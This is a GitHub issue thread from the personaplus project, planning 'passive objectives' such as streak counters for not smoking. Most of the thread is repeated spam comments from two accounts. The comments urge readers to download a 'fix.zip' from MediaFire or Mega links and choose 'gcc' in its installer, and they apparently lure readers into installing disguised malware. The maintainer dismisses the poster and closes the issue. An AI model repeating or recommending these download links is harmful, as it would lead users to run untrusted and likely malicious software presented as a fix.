### ISSUE TITLE
To Do - Passive Objectives

### ISSUE THREAD

**Issue by ZakaHaceCosas** [ZakaHaceCosas/personaplus#9]
# Passive objectives

> [!TIP]
> **What they are**: Think of them as "goals", like "not smoking", to give a generic example. There are many apps that act as trackers for you to take account of how many days you've been without smoking. While it might seem simple, making _not smoking_ seem like some sort of a "game", or something you're "rewarded" for (in-app, e.g. a streak), tends to have a positive effect on the user helping them with their addiction, so they're worth implementing-

### To Do:
- [x] Creation
  - [ ] Presets (e.g. "Don't smoke", "Don't take alcohol", etc...)
  - [x] Custom (maybe someone wants to set "Don't play Valorant" as a Passive Objective) (actually, for the jokes, "Don't play Valorant" will be a preset).
- [x] Editing them
- [x] Removing them
- [x] Simple functionality: each day you log if you accomplished or not, counter is incremented (or reset if you fail) and that's it.
- [x] Reset counter when the user tells the app he has failed.
- [ ] Implement with the Daily Check[^1]

[^1]: Also see [Daily Check](https://github.com/users/ZakaHaceCosas/projects/1?pane=issue&itemId=75052704)

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by ZakaHaceCosas** [comment]
idiot
![image](https://github.com/user-attachments/assets/20a7324e-ac9c-40a9-9aec-32a632ce3e39)

**Comment by ZakaHaceCosas** [comment]
We've rethought the app and will reorganize our ROADMAP. Closing all tracking issues for now.
